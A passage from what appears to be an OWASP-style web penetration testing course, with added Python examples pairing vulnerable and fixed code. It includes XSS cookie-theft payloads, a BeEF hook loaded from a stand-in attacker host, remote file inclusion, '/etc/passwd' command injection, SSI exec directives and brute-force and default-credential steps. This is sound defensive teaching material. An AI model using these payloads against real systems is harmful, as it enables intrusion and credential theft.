• A penetration test is a method of evaluating the security of a computer system or network by simulating an attack.
• A web application penetration test focuses only on evaluating the security of a web application.
• The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities.
• Any security issues that are found are presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.
What is a vulnerability?
• A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy.
• A threat is a potential attack that, by exploiting a vulnerability, may harm the assets owned by an application (resources of value, such as the data in a database or in the file system).
• A test is an action that tends to show a vulnerability in the application.
Vulnerabilities are everywhere.
The OWASP Web Application Penetration Testing method is based on the black box approach: the tester knows nothing, or very little, about the application to be tested. The testing model consists of:
• Tester: who performs the testing activities
• Tools and methodology: the core of the Testing Guide project
• Application: the black box to test
The test is divided into two phases:
1. Passive mode
2. Active mode
In the passive mode, the tester tries to understand the application's logic and plays with the application. Tools can be used for information gathering. At the end of this phase, the tester should understand all the access points (gates) of the application.
In the active mode, the tester begins to test using the methodology. The set of active tests is split into 12 sub-categories for a total of 91 controls:
I. Information Gathering
II. Configuration and Deploy Management Testing
III. Identity Management Testing
IV. Authentication Testing
V. Authorization Testing
VI. Session Management Testing
VII. Data Validation Testing
VIII. Error Handling
IX. Cryptography
X. Logging
XI. Business Logic Testing
XII. Client Side Testing
1. Conduct Search Engine Discovery and Reconnaissance for Information Leakage
2. Fingerprint Web Server
3. Review Webserver Metafiles for Information Leakage
4. Enumerate Applications on Webserver
5. Review Webpage Comments and Metadata for Information Leakage
6. Identify application entry points
7. Map execution paths through application
8. Fingerprint Web Application Framework
9. Fingerprint Web Application
10. Map Network and Application Architecture
Google Hacking Database
Using a search engine, search for:
[1] Network diagrams and configurations
[2] Archived posts and emails by administrators and other key staff
[3] Logon procedures and username formats
[4] User names and passwords
[5] Error message content
[6] Development, test, UAT and staging versions of the website
Queries are grouped into several categories: Footholds; Files containing usernames; Sensitive Directories; Web Server Detection; Vulnerable Files; Vulnerable Servers; Error Messages; Files containing juicy info; Files containing passwords; Sensitive Online Shopping Info.
Web application response
Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing.
Review the robots.txt file for information leakage of the web application's directory/folder paths (Disallow entries name exactly the paths the owner did not want indexed).
Enumerating applications on a web server means finding out which particular applications are hosted on it (virtual hosts, non-standard ports, non-obvious URL paths).
Reverse-IP services
Review webpage comments and metadata to better understand the application and to find any information leakage.
Step 1) Navigate to http://app.utu.ac.in/, intercept the request with Burp Suite and send it to Intruder.
Step 2) On the "Positions" tab, select the method ("GET") in the request and click "Add".
Step 3) On the "Payloads" tab, select "HTTP Verbs" under Payload Options.
Step 4) From the "Intruder" menu, select "Start attack".
Observe each request and its response.
Response for the OPTIONS method (the Allow header lists the verbs the server has enabled)
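The four Burp Intruder steps above, scripted, as an added example that is not part of the original deck (and not Burp's own code): a Python probe that sends each HTTP verb to a target and reports the ones the server accepts that an application rarely needs. Since the deck's target (http://app.utu.ac.in/) cannot be used here, the block starts a deliberately permissive local HTTP server as a constructed stand-in; the verb list, the set treated as dangerous and the stand-in server's behaviour are assumptions of the demo.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Verbs worth probing (assumed list). An application usually needs only GET/POST/HEAD.
VERBS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH"]
# Verbs whose acceptance is a finding on its own: PUT/DELETE change server content,
# TRACE echoes the request back (cross-site tracing).
DANGEROUS = {"PUT", "DELETE", "TRACE"}


class _PermissiveHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: a server that leaves too many verbs enabled."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._reply(200, b"home")

    def do_OPTIONS(self):
        # Advertises the enabled verbs, which is what the OPTIONS step above looks at.
        self.send_response(200)
        self.send_header("Allow", "GET,HEAD,OPTIONS,TRACE,PUT")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_TRACE(self):
        self._reply(200, self.requestline.encode())

    def do_PUT(self):
        self._reply(201)

    def do_DELETE(self):
        self._reply(403)
    # Verbs without a do_<VERB> method get 501 from BaseHTTPRequestHandler.


def probe_methods(host, port, path="/"):
    """Send every verb in VERBS to path and record the status code each one gets."""
    results = {}
    for verb in VERBS:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        try:
            conn.request(verb, path)
            results[verb] = conn.getresponse().status
        finally:
            conn.close()
    return results


def risky_methods(results):
    """Dangerous verbs the server answered with a 2xx status, sorted."""
    return sorted(v for v, code in results.items() if v in DANGEROUS and 200 <= code < 300)


def run_demo():
    """Start the stand-in server on a free localhost port, probe it, shut it down."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), _PermissiveHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        results = probe_methods("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()
    return results, risky_methods(results)


if __name__ == "__main__":
    results, risky = run_demo()
    for verb, code in results.items():
        print(f"{verb:8s} {code}")
    print("accepted but risky:", risky)
```

Against a real target call probe_methods(host, port, path) directly. PUT or DELETE answered with 2xx means the server will accept content changes; TRACE answered with 2xx is the cross-site tracing condition that the Allow header in the OPTIONS response hints at.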
Request made process
The X-Powered-By header contains the development language or framework name and version.
Default cookie names reveal the framework, as does the WordPress directory structure. For the default cookie names of other frameworks, refer to pages 75-76 of the documentation.
WhatWeb: currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build.
BlindElephant: this tool works on the principle of static-file checksum comparison between versions, which gives very high quality fingerprinting. Language: Python.
Wappalyzer is a Firefox/Chrome plug-in.
Web server fingerprinting is a critical task for the penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. Nmap version detection offers many advanced features that help in determining the services running on a given host: it obtains all data by connecting to open ports and interrogating them with probes that the specific services understand.
• List all the possible administrative interfaces.
• Determine if administrative interfaces are available from an internal network or are also available from the Internet.
Firewall/IDS identifier script
1. Test Network/Infrastructure Configuration
2. Test Application Platform Configuration
3. Test File Extensions Handling for Sensitive Information
4. Backup and Unreferenced Files for Sensitive Information
5. Enumerate Infrastructure and Application Admin Interfaces
6. Test HTTP Methods
7. Test HTTP Strict Transport Security
8. Test RIA cross domain policy
Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or new vulnerabilities that compromise the application itself.
1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework.
2. There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.
1. Handle server errors (40x or 50x) with custom-made pages instead of the default web server pages.
2. Logging information
3. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default.
4. Only enable server modules (ISAPI extensions in the IIS case) that are needed for the application.
Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have later been found to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache's Cocoon).
When each file stem is tested, Burp checks for the various file extensions configured in these settings.
While most of the files within a web server are directly handled by the server itself, it is not uncommon to find unreferenced and/or forgotten files that can be used to obtain important information about either the infrastructure or the credentials. The backup-file test is the same, restricted to backup copies of files (e.g. .bak, .old, editor swap files).
THC-Hydra for brute-force attacks:
1) Set the target, port number or protocol
2) Add the username and password lists
3) Start the attack; after some time we obtain the root user's password
Refer to "Identify application entry points" above.
Whether the application uses this header must be checked, to know if the following security issues could occur:
• Attackers sniffing the network traffic and accessing the information transferred over an unencrypted channel.
• Attackers exploiting a man-in-the-middle attack because the browser accepts certificates that are not trusted.
• Users who mistakenly enter an address in the browser with HTTP instead of HTTPS, or who click a link in the web application that mistakenly uses the http scheme.

HSTS header:
Strict-Transport-Security: max-age=60000; includeSubDomains
Rich Internet Applications (RIA) have adopted Adobe's crossdomain.xml policy files in order to allow for controlled cross-domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash.
1. Test Role Definitions
2. Test User Registration Process
3. Test Account Provisioning Process
4. Testing for Account Enumeration and Guessable User Account
5. Testing for Weak or unenforced username policy
Role           Permission   Object            Constraints
Administrator  Read         Customer records  -
Manager        Read         Customer records  Only records related to business unit
Staff          Read         Customer records  Only records associated with customers assigned by Manager
Customer       Read         Customer record   Only own record
• Verify that the identity requirements for user registration align with business/security requirements
• Validate the registration process
Verify which accounts may provision other accounts, and of what type.
Structured account names:
CN000100
CN000101
….
R1001 – user 001 for REALM1
R2001 – user 001 for REALM2
User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks), so valid account names can easily be guessed.
1. Testing for Credentials Transported over an Encrypted Channel
2. Testing for default credentials
3. Testing for Weak lock out mechanism
4. Testing for bypassing authentication schema
5. Test remember password functionality
6. Testing for Browser cache weakness
7. Testing for Weak password policy
8. Testing for Weak security question/answer
9. Testing for weak password change or reset functionalities
10. Testing for Weaker authentication in alternative channel
SSLStrip
A GET request that sends the credentials: they end up in the URL, and therefore in browser history and in proxy and server logs.
User           Password
Tester         Tester
Webmaster      Webmaster
Admin          Admin123
System         System
Administrator  admin
……             …….
Accounts are typically locked after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-service unlock mechanism, or by intervention of an administrator.
There are several methods to bypass the authentication schema in use by a web application:
• Direct page request (forced browsing)
• Parameter modification
• Session ID prediction
• SQL injection
• Remember-password functionality stores your credentials in a cookie.
• You must check whether the stored credential is encrypted or in clear text.
Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0

HTTP/1.1:
Cache-Control: no-cache

HTTP/1.0:
Pragma: no-cache
Expires: <past date or illegal value (e.g., 0)>
The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high-profile hacks that have revealed user credentials, it is lamented that the most common passwords are still: 123456, password.
Pre-generated questions: the majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example:
• The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?"
• The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?"
• The answers may be brute-forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable list of popular first names, and therefore a simple brute force attack can be scripted.
• The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page.
In addition to the previous test it is important to verify: is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed, if an attacker is able to take control of a valid session, (s)he could easily change the victim's password.
1. Testing Directory traversal/file include
2. Testing for bypassing authorization schema
3. Testing for Privilege Escalation
4. Testing for Insecure Direct Object References
• Is it possible to access that resource even if the user is not authenticated?
• Is it possible to access that resource after the log-out?
• Is it possible to access functions and resources that should be accessible to a user that holds a different role/privilege?

POST /admin/addUser.jsp HTTP/1.1
Host: www.example.com
[other HTTP headers]

userID=fakeuser&role=3&group=grp001
POST /user/viewOrder.jsp HTTP/1.1
Host: www.example.com
……

groupID=grp001&orderID=0001

Verify if a user that does not belong to grp001 can modify the value of the parameters 'groupID' and 'orderID' to gain access to that privileged data.
HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 1 Apr 2006 13:51:20 GMT
Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com
Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=www.example.com
Cache-Control: no-cache
Pragma: No-cache
Content-length: 247
Content-Type: text/html
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<form name="autoriz" method="POST" action="visual.jsp">
<input type="hidden" name="profile" value="SysAdmin">
<body onload="document.forms.autoriz.submit()">
</td>
</tr>

The hidden profile field is chosen by the client and trusted by the server; submitting a different value (e.g. a more privileged profile) is the privilege-escalation test.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to point directly to an object.
http://foo.bar/somepage?invoice=12345
http://foo.bar/showImage?img=img00011
http://foo.bar/changepassword?user=someuser
http://foo.bar/accessPage?menuitem=12
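The two requests above (addUser.jsp with a client-chosen role, viewOrder.jsp with a client-chosen groupID/orderID pair) as working code, an added example that is not from the deck or from OWASP. The ORDERS, USER_GROUP and USER_ROLE tables and the function names are constructed for the demo; each vulnerable function is shown next to the version that takes the authorization decision from server-side state instead of from the request.

```python
# Constructed sample data standing in for the application's database.
ORDERS = {
    ("grp001", "0001"): {"customer": "alice", "total": 120.0},
    ("grp002", "0002"): {"customer": "bob", "total": 75.5},
}
USER_GROUP = {"alice": "grp001", "bob": "grp002"}
USER_ROLE = {"alice": "staff", "bob": "staff", "carol": "admin"}


class Forbidden(Exception):
    pass


def view_order_vulnerable(session_user, group_id, order_id):
    """The IDOR shape from the viewOrder.jsp request: the server checks that the
    caller is logged in, then trusts the client-supplied groupID/orderID pair."""
    if session_user not in USER_GROUP:
        raise Forbidden("not authenticated")
    return ORDERS[(group_id, order_id)]


def view_order_fixed(session_user, order_id):
    """The group comes from the server-side session, never from the request, and
    a miss looks the same whether the order does not exist or belongs to someone
    else, so the endpoint cannot be used to enumerate other groups' order IDs."""
    group_id = USER_GROUP.get(session_user)
    if group_id is None:
        raise Forbidden("not authenticated")
    record = ORDERS.get((group_id, order_id))
    if record is None:
        raise Forbidden("no such order")
    return record


def add_user_vulnerable(session_user, new_user, role):
    """The addUser.jsp shape: the requested role is taken from the POST body."""
    if session_user not in USER_ROLE:
        raise Forbidden("not authenticated")
    USER_ROLE[new_user] = role
    return role


def add_user_fixed(session_user, new_user, role):
    """Role assignment is a privileged action: check the caller's own role first."""
    if USER_ROLE.get(session_user) != "admin":
        raise Forbidden("admin only")
    USER_ROLE[new_user] = role
    return role


def probe_idor(session_user, candidates):
    """What the tester does with a low-privilege session: walk identifiers the
    user should not own and record every one the endpoint hands back."""
    leaked = []
    for group_id, order_id in candidates:
        try:
            view_order_vulnerable(session_user, group_id, order_id)
            leaked.append((group_id, order_id))
        except (Forbidden, KeyError):
            pass
    return leaked


def denied(fn, *args):
    """True if the call is refused with Forbidden."""
    try:
        fn(*args)
        return False
    except Forbidden:
        return True
```

The fixed lookup deliberately returns the same error for "not found" and "not yours"; a distinguishable response would turn the authorization bug into an enumeration oracle.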
1. Testing for Bypassing Session Management Schema
2. Testing for Cookies attributes
3. Testing for Session Fixation
4. Testing for Exposed Session Variables
5. Testing for Cross Site Request Forgery
6. Testing for logout functionality
7. Test Session Timeout
8. Testing for Session puzzling
If you have access to the session management schema implementation, you can check for the following:
• Random session token
• Token length
• Session time-out
• Cookie configuration:
  o non-persistent: kept only in RAM, not written to disk
  o secure (sent only over an HTTPS channel): Set-Cookie: cookie=data; path=/; domain=.aaa.it; secure
  o HttpOnly (not readable by script): Set-Cookie: cookie=data; path=/; domain=.aaa.it; HttpOnly
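Added example (not part of the original deck) for the "random session token" and "token length" checks above: a few statistical sanity checks a tester can run over a batch of captured session IDs. The thresholds (16 characters, 3 bits of entropy per position) and the two sample token sets are assumptions made for the demo; low per-position entropy across most positions is the signature of counters, timestamps or user IDs embedded in the token.

```python
import math
import secrets
from collections import Counter


def shannon_entropy_bits(values):
    """Shannon entropy of a sample of symbols, in bits per symbol."""
    counts = Counter(values)
    total = len(values)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def assess_tokens(tokens, min_length=16, min_position_bits=3.0):
    """Cheap checks over captured session IDs: length, uniqueness and how much
    each character position actually varies. A strong token varies at almost
    every position; a counter or timestamp leaves most positions constant."""
    length = len(tokens[0])
    findings = []
    if any(len(t) != length for t in tokens):
        findings.append("inconsistent length")
    if length < min_length:
        findings.append(f"short token ({length} chars)")
    if len(set(tokens)) != len(tokens):
        findings.append("duplicate tokens in sample")
    weak_positions = [
        i for i in range(length)
        if shannon_entropy_bits([t[i] for t in tokens]) < min_position_bits
    ]
    if len(weak_positions) > length // 2:
        findings.append(f"{len(weak_positions)} of {length} positions barely change")
    return findings


def demo_tokens():
    """Constructed samples: a sequential scheme versus CSPRNG-backed tokens."""
    sequential = [f"SESS{1000 + i:012d}" for i in range(64)]
    random_ids = [secrets.token_hex(16) for _ in range(64)]
    return assess_tokens(sequential), assess_tokens(random_ids)
```

Collect the sample from repeated logins with an interception proxy, then feed the Set-Cookie values to assess_tokens; the per-position check catches the "mostly constant prefix plus counter" scheme that a single token inspection misses.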
Session ID before login
Session ID after login (if it is the same value, the application is open to session fixation)
• How are session IDs transferred? e.g., GET, POST, form field (including hidden fields)
• Are session IDs always sent over encrypted transport by default?
• Is it possible to manipulate the application to send session IDs unencrypted? e.g., by changing HTTPS to HTTP
• What cache-control directives are applied to requests/responses passing session IDs?
• Are these directives always present? If not, where are the exceptions?
• Are GET requests incorporating the session ID used?
• If POST is used, can it be interchanged with GET?
Request submission without any CSRF token. A successful CSRF exploit can compromise end user data and operations when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.
Testing for logout functionality:
• Testing the logout user interface
• Testing for server-side session termination
• Testing for session timeout
• Testing session clean-up at the client side

In this phase, we check that the application automatically logs out a user who has been idle for a certain amount of time, ensuring that it is not possible to "reuse" the same session and that no sensitive data remains stored in the browser cache.
This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers, so that the session variable is set in one context and then used in another.
1. Testing for Reflected Cross Site Scripting
2. Testing for Stored Cross Site Scripting
3. Testing for HTTP Verb Tampering
4. Testing for HTTP Parameter pollution
5. Testing for SQL Injection
   5.1 Oracle Testing
   5.2 MySQL Testing
   5.3 SQL Server Testing
   5.4 Testing PostgreSQL
   5.5 MS Access Testing
   5.6 Testing for NoSQL injection
   ……….
6. Testing for LDAP Injection
7. Testing for ORM Injection
8. Testing for XML Injection
9. Testing for SSI Injection
10. Testing for XPath Injection
11. IMAP/SMTP Injection
12. Testing for Code Injection
   12.1 Testing for Local File Inclusion
   12.2 Testing for Remote File Inclusion
13. Testing for Command Injection
14. Testing for Buffer overflow
   14.1 Testing for Heap overflow
   14.2 Testing for Stack overflow
   14.3 Testing for Format string
15. Testing for incubated vulnerabilities
16. Testing for HTTP Splitting/Smuggling
Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser-executable code within a single HTTP response.
http://example.com/index.php?user=<script>alert(123)</script>
For XSS filter bypass techniques see page 224 of the documentation.
Payload for an e-mail field:
aaa@aa.com"><script>alert(document.cookie)</script>
BeEF hook:
aaa@aa.com"><script src=http://attackersite/hook.js></script>
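Added example (not from the deck) for the reflected payloads above: the vulnerable reflection, the same output with attribute-context encoding, and the canary-based check a tester uses to see which metacharacters survive. render_unsafe, render_safe and the canary are constructed for the demo; html.escape is right for HTML element and attribute context only, JavaScript and URL contexts need their own encoders.

```python
import html

# The slide's payloads (the second is the e-mail-field variant).
PAYLOADS = [
    "<script>alert(123)</script>",
    'aaa@aa.com"><script>alert(document.cookie)</script>',
]
CANARY_PREFIX = "zqx7"   # unlikely to occur naturally in the page
METACHARS = "\"'<>"      # what an attacker needs to break out of an attribute


def render_unsafe(user):
    """The vulnerable pattern: the parameter is dropped into the page verbatim."""
    return f'<input name="user" value="{user}">'


def render_safe(user):
    """Same page with output encoding for the attribute context."""
    return f'<input name="user" value="{html.escape(user, quote=True)}">'


def exploitable(render, payload):
    """True if the payload comes back byte-for-byte, i.e. as live markup."""
    return payload in render(payload)


def probe_reflection(render):
    """Tester's check: inject a harmless canary made of the metacharacters and
    report which of them come back unencoded. None means not reflected at all."""
    page = render(CANARY_PREFIX + METACHARS)
    idx = page.find(CANARY_PREFIX)
    if idx < 0:
        return None
    start = idx + len(CANARY_PREFIX)
    tail = page[start:start + len(METACHARS)]
    return [ch for ch in METACHARS if ch in tail]
```

The canary probe is what to send first: it is harmless, does not trip simple "alert(" filters, and tells you which of the four characters you can rely on before you craft the actual payload for that context.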
HTTP verb tampering uses the same Burp Intruder procedure as in steps 1 to 4 above (mark the method in the request as the payload position, use the "HTTP Verbs" payload list, start the attack): observe which verbs the application accepts and whether authentication or access control differs between them.
Web Application Server Backend                Parsing Result                      Example
ASP.NET / IIS                                 concatenated with a comma           color=red,blue
ASP / IIS                                     concatenated with a comma           color=red,blue
PHP / Apache                                  last occurrence only                color=blue
PHP / Zeus                                    last occurrence only                color=blue
JSP, Servlet / Apache Tomcat                  first occurrence only               color=red
JSP, Servlet / Oracle Application Server 10g  first occurrence only               color=red
JSP, Servlet / Jetty                          first occurrence only               color=red
IBM Lotus Domino                              last occurrence only                color=blue
IBM HTTP Server                               first occurrence only               color=red
mod_perl, libapreq2 / Apache                  first occurrence only               color=red
Perl CGI / Apache                             first occurrence only               color=red
mod_wsgi (Python) / Apache                    first occurrence only               color=red
Python / Zope                                 all occurrences in List data type   color=['red','blue']

Test URL: http://example.com/?color=red&color=blue

Authentication bypass: the security token is validated against one occurrence of blogID while the invite is applied to the other.
POST /add-authors.do HTTP/1.1
security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=tester@gmail.com(attacker email)&ok=Invite
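Added example (not from the deck): how the backends in the table above resolve a repeated parameter, a check for polluted parameters, and the condition the add-authors.do request exploits, namely a front-end check and the application reading different occurrences of the same parameter. The strategy names and gateway_mismatch are constructed for the demo; the mapping of backends to strategies follows the table.

```python
from urllib.parse import parse_qsl

# How the backends in the table resolve a repeated parameter. The strategy
# names are ours; the grouping follows the table.
STRATEGIES = {
    "first": lambda vals: vals[0],           # Tomcat, Jetty, IBM HTTP Server, mod_perl, Perl CGI, mod_wsgi
    "last": lambda vals: vals[-1],           # PHP/Apache, PHP/Zeus, Lotus Domino
    "concat": lambda vals: ",".join(vals),   # ASP.NET/IIS, ASP/IIS
    "all": lambda vals: list(vals),          # Python/Zope
}

TEST_QUERY = "color=red&color=blue"
BYPASS_QUERY = ("security_token=attackertoken&blogID=attackerblogidvalue"
                "&blogID=victimblogidvalue&authorsList=tester@gmail.com&ok=Invite")


def grouped(query):
    """All values of every parameter, in the order they appear."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        out.setdefault(key, []).append(value)
    return out


def resolve(query, strategy):
    """Collapse duplicates the way the chosen backend does."""
    pick = STRATEGIES[strategy]
    return {k: pick(v) for k, v in grouped(query).items()}


def polluted_params(query):
    """Tester's view: parameters that appear more than once."""
    return sorted(k for k, v in grouped(query).items() if len(v) > 1)


def gateway_mismatch(query, param, front_strategy, back_strategy):
    """The exploitable condition: a front-end check (WAF, token validation) and
    the application read different occurrences of the same parameter."""
    front = resolve(query, front_strategy).get(param)
    back = resolve(query, back_strategy).get(param)
    return front != back, front, back
```

When the front end and the application are different products (reverse proxy plus app server is the usual case), look both up in the table; any pair with different strategies is a candidate for this bypass.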
LDAP injection testing is similar to SQL injection testing. The differences are that we use the LDAP protocol instead of SQL and that the target is an LDAP server instead of a SQL server.
"(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";
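Added example (not from the deck or OWASP) for the filter above: the same concatenated filter beside one that escapes the user-supplied values per RFC 4515, and a small scanner that shows how the injected value turns one filter into two top-level expressions. The injected user name and the helper functions are constructed for the demo; the {MD5} userPassword form is kept only to mirror the slide (it is not a recommended password storage scheme).

```python
import base64
import hashlib

# RFC 4515 escaping for values placed inside a search filter.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def escape_filter_value(value):
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def md5_userpassword(password):
    """{MD5} userPassword syntax, as in the slide's filter (kept only to mirror it)."""
    digest = hashlib.md5(password.encode()).digest()
    return "{MD5}" + base64.b64encode(digest).decode()


def build_filter_vulnerable(user, password):
    """Direct concatenation, the construction shown on the slide."""
    return "(&(uid=" + user + ")(userPassword=" + md5_userpassword(password) + "))"


def build_filter_safe(user, password):
    """Same filter with every user-controlled value escaped."""
    return ("(&(uid=" + escape_filter_value(user) + ")(userPassword="
            + escape_filter_value(md5_userpassword(password)) + "))")


def top_level_groups(filt):
    """Split a filter string into its top-level parenthesised expressions.
    A well-formed filter has exactly one; the injection below produces two,
    the second being an OR on uid=* that no longer depends on the password."""
    groups, depth, start = [], 0, 0
    for i, ch in enumerate(filt):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                groups.append(filt[start:i + 1])
    return groups


# Classic injected user name: closes the uid clause and opens an OR on uid=*.
INJECTED_USER = "*)(uid=*))(|(uid=*"
```

Many LDAP servers evaluate only the first top-level expression and ignore the rest, which is exactly why the trailing garbage the injection leaves behind does not cause a syntax error; the scanner makes that split visible without a directory to test against.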
An ORM is an Object Relational Mapping tool. It is used to expedite object-oriented development within the data access layer of software applications, including web applications.
Testing for ORM injection vulnerabilities is identical to SQL injection testing (see Testing for SQL Injection).
Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"
Simply sending "' OR 1--" in the form where the order date can be entered can yield positive results.
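Added example (not from the deck): the find_all pattern above carried into Python with sqlite3, the string-interpolated query beside the parameterised one, and the boolean differential probe a tester uses to confirm that input reaches the query unparameterised. The in-memory orders table and the function names are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory orders table standing in for the application's store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, customer_id INTEGER, order_date TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        (1, 123, "2013-10-01"),
        (2, 123, "2013-10-02"),
        (3, 999, "2013-10-01"),
    ])
    return conn


def find_orders_vulnerable(conn, customer_id, order_date):
    """String interpolation, the same shape as the find_all call above."""
    sql = (f"SELECT id FROM orders WHERE customer_id = {customer_id} "
           f"AND order_date = '{order_date}'")
    return [row[0] for row in conn.execute(sql)]


def find_orders_safe(conn, customer_id, order_date):
    """Bound parameters: the value can never change the statement's structure."""
    sql = "SELECT id FROM orders WHERE customer_id = ? AND order_date = ?"
    return [row[0] for row in conn.execute(sql, (customer_id, order_date))]


def boolean_probe(query_fn, conn, customer_id, base_value):
    """Tester's differential check: append a true and a false tautology to a
    known-good value. If the two result sets differ, the input is being
    interpreted as SQL."""
    true_case = query_fn(conn, customer_id, base_value + "' OR 1--")
    false_case = query_fn(conn, customer_id, base_value + "' AND 0--")
    return true_case != false_case
```

The probe works even when the application hides errors: the "true" tautology widens the result set (customer 999's order shows up for customer 123), the "false" one empties it, and the parameterised version returns nothing for both because the whole string is compared as a date.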
Web servers usually give developers the ability to add small pieces of dynamic code inside static HTML pages, without having to deal with full-fledged server-side or client-side languages. This feature is provided by Server-Side Includes (SSI); SSI injection is the abuse of it through user-controlled input that ends up in a page the server parses for directives.
SSI directives are processed in .shtml files (or wherever the server is configured to parse them). Putting an SSI directive into a static HTML document is as easy as writing a piece of code like the following:

<!--#echo var="DATE_LOCAL" -->
to print out the current time.

<!--#include virtual="/cgi-bin/counter.pl" -->
to include the output of a CGI script.

<!--#include virtual="/footer.html" -->
to include the content of a file or list files in a directory.

<!--#exec cmd="ls" -->
to include the output of a system command.
FETCH 4791 BODY[HEADER]

In this scenario, the IMAP injection structure would be:

http://<webmail>/read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791

which would generate the following commands:

???? FETCH 4791 BODY[HEADER]
V100 CAPABILITY
V101 FETCH 4791 BODY[HEADER]

where:

Header = 4791 BODY[HEADER]
Body   = %0d%0aV100 CAPABILITY%0d%0a
Footer = V101 FETCH 4791

Result expected: arbitrary IMAP/SMTP command injection
Code injection example URL:
http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a
Testing for Local File Inclusion
Testing for Remote File Inclusion: the included file is fetched from a host the tester controls, e.g. http://youarehack.com
Directory traversal / command injection examples:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
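Added example (not from the deck) for the three URLs above: a document-root check that refuses the doc=/bin/ls and ../ cases, a view of how the shell splits "ls " + dir once dir is ";cat /etc/passwd", and the argv-based alternative that never involves a shell. DOC_ROOT and the function names are assumptions for the demo.

```python
import posixpath
import shlex
from urllib.parse import unquote

DOC_ROOT = "/var/www/userdata"  # assumed document root for the demo


class Rejected(ValueError):
    pass


def resolve_document(doc, root=DOC_ROOT):
    """Hardened version of the userData.pl?doc= lookup: canonicalise the name and
    refuse anything that is absolute, contains NUL, or leaves the document root."""
    if "\0" in doc or posixpath.isabs(doc):
        raise Rejected(doc)
    candidate = posixpath.normpath(posixpath.join(root, doc))
    if posixpath.commonpath([root, candidate]) != root:
        raise Rejected(doc)
    return candidate


def is_rejected(doc):
    """True if resolve_document refuses the name."""
    try:
        resolve_document(doc)
        return False
    except Rejected:
        return True


def shell_commands(cmdline):
    """How /bin/sh would split the line: ';' ends one command and starts the next.
    Used to show what 'ls ' + dir becomes when dir is ';cat /etc/passwd'."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def list_dir_argv(directory):
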